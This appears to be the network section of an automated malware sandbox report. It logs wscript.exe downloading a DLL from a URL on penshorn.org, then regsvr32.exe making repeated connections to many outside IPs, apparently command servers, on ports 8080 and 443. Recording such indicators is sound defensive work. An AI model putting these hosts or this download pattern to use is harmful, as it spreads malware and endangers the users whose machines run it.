                                                                                                                                                                                                          Mar 17, 2023 09:24:22.815151930 CET8049701187.63.160.88192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:22.815192938 CET8049701187.63.160.88192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:22.815371990 CET4970180192.168.2.4187.63.160.88
                                                                                                                                                                                                          Mar 17, 2023 09:24:22.815511942 CET4970180192.168.2.4187.63.160.88
                                                                                                                                                                                                          Mar 17, 2023 09:24:22.815586090 CET4970180192.168.2.4187.63.160.88
                                                                                                                                                                                                          Mar 17, 2023 09:24:23.044620037 CET8049701187.63.160.88192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:23.044673920 CET8049701187.63.160.88192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:23.731826067 CET497028080192.168.2.4167.172.199.165
                                                                                                                                                                                                          Mar 17, 2023 09:24:23.900594950 CET808049702167.172.199.165192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:24.413857937 CET497028080192.168.2.4167.172.199.165
                                                                                                                                                                                                          Mar 17, 2023 09:24:24.581857920 CET808049702167.172.199.165192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:25.085766077 CET497028080192.168.2.4167.172.199.165
                                                                                                                                                                                                          Mar 17, 2023 09:24:25.253880978 CET808049702167.172.199.165192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.739527941 CET49703443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.739598989 CET44349703164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.739697933 CET49703443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.740469933 CET49703443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.740502119 CET44349703164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.774086952 CET44349703164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.776228905 CET49704443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.776304960 CET44349704164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.776395082 CET49704443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.778126001 CET49704443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.778156996 CET44349704164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.811315060 CET44349704164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.812932014 CET49705443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.813000917 CET44349705164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.813118935 CET49705443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.814861059 CET49705443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.814882994 CET44349705164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.848220110 CET44349705164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.849152088 CET49706443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.849209070 CET44349706164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.849307060 CET49706443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.850092888 CET49706443192.168.2.4164.90.222.65
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.850121975 CET44349706164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:30.882636070 CET44349706164.90.222.65192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:37.030137062 CET497078080192.168.2.4104.168.155.143
                                                                                                                                                                                                          Mar 17, 2023 09:24:37.194215059 CET808049707104.168.155.143192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:37.710962057 CET497078080192.168.2.4104.168.155.143
                                                                                                                                                                                                          Mar 17, 2023 09:24:37.875022888 CET808049707104.168.155.143192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:38.555761099 CET497078080192.168.2.4104.168.155.143
                                                                                                                                                                                                          Mar 17, 2023 09:24:38.719918013 CET808049707104.168.155.143192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:44.231981993 CET497088080192.168.2.4163.44.196.120
                                                                                                                                                                                                          Mar 17, 2023 09:24:47.244663000 CET497088080192.168.2.4163.44.196.120
                                                                                                                                                                                                          Mar 17, 2023 09:24:47.455110073 CET808049708163.44.196.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:47.963401079 CET497088080192.168.2.4163.44.196.120
                                                                                                                                                                                                          Mar 17, 2023 09:24:48.174174070 CET808049708163.44.196.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:53.494478941 CET497098080192.168.2.4160.16.142.56
                                                                                                                                                                                                          Mar 17, 2023 09:24:56.620398998 CET497098080192.168.2.4160.16.142.56
                                                                                                                                                                                                          Mar 17, 2023 09:25:02.620944023 CET497098080192.168.2.4160.16.142.56
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.243983030 CET49710443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.244041920 CET44349710159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.244158030 CET49710443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.244827986 CET49710443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.244841099 CET44349710159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.507630110 CET44349710159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.511969090 CET49711443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.512105942 CET44349711159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.512366056 CET49711443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.513088942 CET49711443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.513115883 CET44349711159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.802592039 CET44349711159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.808130980 CET49712443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.808201075 CET44349712159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.809500933 CET49712443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.809801102 CET49712443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:09.809823036 CET44349712159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.097656965 CET44349712159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.116441965 CET49713443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.116507053 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.116662025 CET49713443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.148425102 CET49713443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.148466110 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.448393106 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:16.741115093 CET497148080192.168.2.4159.65.88.10
                                                                                                                                                                                                          Mar 17, 2023 09:25:16.772496939 CET808049714159.65.88.10192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:17.434638023 CET497148080192.168.2.4159.65.88.10
                                                                                                                                                                                                          Mar 17, 2023 09:25:17.466041088 CET808049714159.65.88.10192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:18.028597116 CET497148080192.168.2.4159.65.88.10
                                                                                                                                                                                                          Mar 17, 2023 09:25:18.059927940 CET808049714159.65.88.10192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.486808062 CET49715443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.486881971 CET44349715186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.487023115 CET49715443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.487759113 CET49715443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.487801075 CET44349715186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.711339951 CET44349715186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.715863943 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.715930939 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.716063023 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.717216015 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.717248917 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.942513943 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.944767952 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.944834948 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.945121050 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.945871115 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.945904970 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.173734903 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.178262949 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.178334951 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.178653955 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.179604053 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.179636955 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.410630941 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:29.747349977 CET497198080192.168.2.4149.56.131.28
                                                                                                                                                                                                          Mar 17, 2023 09:25:32.780581951 CET497198080192.168.2.4149.56.131.28
                                                                                                                                                                                                          Mar 17, 2023 09:25:32.884531975 CET808049719149.56.131.28192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:33.467417955 CET497198080192.168.2.4149.56.131.28
                                                                                                                                                                                                          Mar 17, 2023 09:25:33.570633888 CET808049719149.56.131.28192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:38.993881941 CET497208080192.168.2.472.15.201.15
                                                                                                                                                                                                          Mar 17, 2023 09:25:41.983608007 CET497208080192.168.2.472.15.201.15
                                                                                                                                                                                                          Mar 17, 2023 09:25:47.999798059 CET497208080192.168.2.472.15.201.15
                                                                                                                                                                                                          Mar 17, 2023 09:25:57.240087986 CET497218080192.168.2.41.234.2.232
                                                                                                                                                                                                          Mar 17, 2023 09:25:57.513428926 CET8080497211.234.2.232192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:58.016330957 CET497218080192.168.2.41.234.2.232
                                                                                                                                                                                                          Mar 17, 2023 09:25:58.288600922 CET8080497211.234.2.232192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:58.797503948 CET497218080192.168.2.41.234.2.232
                                                                                                                                                                                                          Mar 17, 2023 09:25:59.069643021 CET8080497211.234.2.232192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:04.491658926 CET497228080192.168.2.482.223.21.224
                                                                                                                                                                                                          Mar 17, 2023 09:26:04.543478966 CET80804972282.223.21.224192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.048072100 CET497228080192.168.2.482.223.21.224
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.100370884 CET80804972282.223.21.224192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.610640049 CET497228080192.168.2.482.223.21.224
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.662640095 CET80804972282.223.21.224192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:11.494659901 CET497238080192.168.2.4206.189.28.199
                                                                                                                                                                                                          Mar 17, 2023 09:26:11.526062012 CET808049723206.189.28.199192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.033034086 CET497238080192.168.2.4206.189.28.199
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.064620018 CET808049723206.189.28.199192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.580019951 CET497238080192.168.2.4206.189.28.199
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.611309052 CET808049723206.189.28.199192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:17.992981911 CET497248080192.168.2.4169.57.156.166
                                                                                                                                                                                                          Mar 17, 2023 09:26:21.002580881 CET497248080192.168.2.4169.57.156.166
                                                                                                                                                                                                          Mar 17, 2023 09:26:27.034291029 CET497248080192.168.2.4169.57.156.166
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.244390011 CET497258080192.168.2.4107.170.39.149
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.343367100 CET808049725107.170.39.149192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.847397089 CET497258080192.168.2.4107.170.39.149
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.946022987 CET808049725107.170.39.149192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:34.456882954 CET497258080192.168.2.4107.170.39.149
                                                                                                                                                                                                          Mar 17, 2023 09:26:34.555433035 CET808049725107.170.39.149192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.010004997 CET49726443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.010071993 CET44349726103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.010181904 CET49726443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.011523962 CET49726443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.011557102 CET44349726103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.298228979 CET44349726103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.299186945 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.299249887 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.299356937 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.300081968 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.300105095 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.589277983 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590181112 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590238094 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590337038 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590842009 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590868950 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.876348972 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.877898932 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.877955914 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.878237963 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.878762960 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.878801107 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:41.164035082 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:46.495404005 CET497308080192.168.2.491.207.28.33
                                                                                                                                                                                                          Mar 17, 2023 09:26:49.505059004 CET497308080192.168.2.491.207.28.33
                                                                                                                                                                                                          Mar 17, 2023 09:26:55.521147966 CET497308080192.168.2.491.207.28.33
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.747709990 CET49731443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.747811079 CET44349731213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.747980118 CET49731443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.750829935 CET49731443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.750864983 CET44349731213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.774331093 CET44349731213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.777400970 CET49732443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.777460098 CET44349732213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.777556896 CET49732443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.778739929 CET49732443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.778762102 CET44349732213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.802412987 CET44349732213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.804744959 CET49733443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.804815054 CET44349733213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.804944038 CET49733443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.808382034 CET49733443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.808413029 CET44349733213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.835067034 CET44349733213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.840928078 CET49734443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.841007948 CET44349734213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.841150999 CET49734443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.845088959 CET49734443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.845148087 CET44349734213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.868532896 CET44349734213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:11.247095108 CET497358080192.168.2.445.235.8.30
                                                                                                                                                                                                          Mar 17, 2023 09:27:11.487809896 CET80804973545.235.8.30192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:11.991252899 CET497358080192.168.2.445.235.8.30
                                                                                                                                                                                                          Mar 17, 2023 09:27:12.232003927 CET80804973545.235.8.30192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:12.741337061 CET497358080192.168.2.445.235.8.30
                                                                                                                                                                                                          Mar 17, 2023 09:27:12.982876062 CET80804973545.235.8.30192.168.2.4

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Mar 17, 2023 09:23:16.032634974 CET5968353192.168.2.48.8.8.8
                                                                                                                                                                                                          Mar 17, 2023 09:23:16.332808971 CET53596838.8.8.8192.168.2.4

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Mar 17, 2023 09:23:16.032634974 CET192.168.2.48.8.8.80xc31eStandard query (0)penshorn.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Mar 17, 2023 09:23:16.332808971 CET8.8.8.8192.168.2.40xc31eNo error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • penshorn.org
                                                                                                                                                                                                          • 182.162.143.56

                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          0192.168.2.449696203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          1192.168.2.449700182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          2192.168.2.449701187.63.160.8880C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Mar 17, 2023 09:24:17.940083027 CET747OUTData Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 23 b1 88 13 52 38 8f 03 0f c3 0d df c7 7e 38 37 38 a8 5f b7 2f 3c 57 b3 f7 cb a5 cd 9c 93 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                          Data Ascii: d#R8~878_/<W*,+0/$#('=<5/@#
                                                                                                                                                                                                          Mar 17, 2023 09:24:18.184503078 CET748INData Raw: 16 03 03 00 41 02 00 00 3d 03 03 6c 6a 31 6b 20 67 82 be 20 77 72 16 3a 72 4d 53 fb 8b c6 6f eb 2b cc 7b f1 78 28 bb 9c 1b 91 89 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8
                                                                                                                                                                                                          Data Ascii: A=lj1k g wr:rMSo+{x(0#00* aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
                                                                                                                                                                                                          Mar 17, 2023 09:24:18.184539080 CET748INData Raw: 7f e0 49 c3 8b 11 db 9f 71 3c 36 d6 da ef 2c da 64 c4 1c 37 d3 1d 81 39 a0 b8 b7 7d 0f ed f0 de 81 d5 92 9c c6 0c b6 80 e9 6f 04 31 96 13 32 62 22 c2 e3 ed e5 0f c8 6f 8a bc 3a e8 86 e7 62 de c1 53 be c4 61 16 03 03 00 04 0e 00 00 00
                                                                                                                                                                                                          Data Ascii: Iq<6,d79}o12b"o:bSa
                                                                                                                                                                                                          Mar 17, 2023 09:24:18.189897060 CET749OUTData Raw: 16 03 03 00 25 10 00 00 21 20 df e4 39 b5 0c 6d 44 e5 75 e2 bc 50 0d 1b d3 ba b6 bc 47 2a c6 84 77 a2 ae c9 0d cc 88 44 7c 75 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 6e b3 b6 d4 06 97 8e 4f 3b e8 0f 69 00 58 f5 53 49 eb 98 78 d8
                                                                                                                                                                                                          Data Ascii: %! 9mDuPG*wD|u(nO;iXSIx)
                                                                                                                                                                                                          Mar 17, 2023 09:24:18.420574903 CET749INData Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 fe 09 29 35 ff ac 68 42 48 fb 09 04 b4 19 65 de 66 d8 87 26 7b 7c 10 60 c1 38 6c f3 a1 4e 09 4e 10 9b 23 a6 23 8a 89 37 ed 56 a6 9f 20 01 c5 18 c9 95 54
                                                                                                                                                                                                          Data Ascii: ,A1NatBI)5hBHef&{|`8lNN##7V TdBO<g9QsJZQ5<{ZQ.^cMzv |s+sqZYT:(<CtSL}CF2RKZ{I
                                                                                                                                                                                                          Mar 17, 2023 09:24:18.423625946 CET749OUTData Raw: 17 03 03 00 75 00 00 00 00 00 00 00 01 8e ac ba 81 5b 71 07 7b da b2 60 b9 52 56 d2 c7 c6 dc 4f 32 f8 4a d8 05 6a 8f d0 ec f9 2f d3 7f a7 d6 ad ae 3b 4e e7 7c b6 9d 3c ab 74 44 c3 5c 1e 34 54 72 3e 7b 8a 2c 66 04 7d ae 80 9e b2 76 b0 42 24 16 65
                                                                                                                                                                                                          Data Ascii: u[q{`RVO2Jj/;N|<tD\4Tr>{,f}vB$e@s@UWG^,i3,r,GN[ac{
                                                                                                                                                                                                          Mar 17, 2023 09:24:19.815290928 CET750INData Raw: 17 03 03 01 3e 3c a3 f9 43 d7 74 0e a4 cd b2 78 62 8f cb c6 48 ea c6 22 2f a1 d4 de f8 dd 90 cb f0 bd 19 31 5f b0 54 7e 6b 87 a4 e0 44 59 8c f4 f5 7d 89 88 72 ba 8a 99 ef 06 8b 4c 26 22 de b1 a4 d0 9c 3c 11 53 f3 ef 61 4c 32 bb a9 89 37 e2 e1 ce
                                                                                                                                                                                                          Data Ascii: ><CtxbH"/1_T~kDY}rL&"<SaL27(8|`^yw[b/fRf36.+G7fM"2'$a$*oKRU*eEHr8xZ $(d6&Im/6eS ^8?)Hm\"q<0L<<"%
                                                                                                                                                                                                          Mar 17, 2023 09:24:22.815151930 CET750INData Raw: 15 03 03 00 1a 3c a3 f9 43 d7 74 0e a5 1e 36 64 a6 11 ea 4d 69 54 34 46 48 87 7a 48 05 b3 a7
                                                                                                                                                                                                          Data Ascii: <Ct6dMiT4FHzH
                                                                                                                                                                                                          Mar 17, 2023 09:24:22.815511942 CET750OUTData Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 fa 26 bf 97 62 83 bc d9 e8 02 71 96 4d b3 3a 23 07 e0
                                                                                                                                                                                                          Data Ascii: &bqM:#


                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          0192.168.2.449696203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2023-03-17 08:23:17 UTC0OUTGET /admin/Ses8712iGR8du/ HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                          Host: penshorn.org
                                                                                                                                                                                                          2023-03-17 08:23:17 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 17 Mar 2023 08:23:17 GMT
                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                          X-Powered-By: PHP/7.0.33
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          Expires: Fri, 17 Mar 2023 08:23:17 GMT
                                                                                                                                                                                                          Content-Disposition: attachment; filename="B0q0jy0MtW4.dll"
                                                                                                                                                                                                          Content-Transfer-Encoding: binary
                                                                                                                                                                                                          Set-Cookie: 641423754fac3=1679041397; expires=Fri, 17-Mar-2023 08:24:17 GMT; Max-Age=60; path=/
                                                                                                                                                                                                          Last-Modified: Fri, 17 Mar 2023 08:23:17 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Content-Type: application/x-msdownload
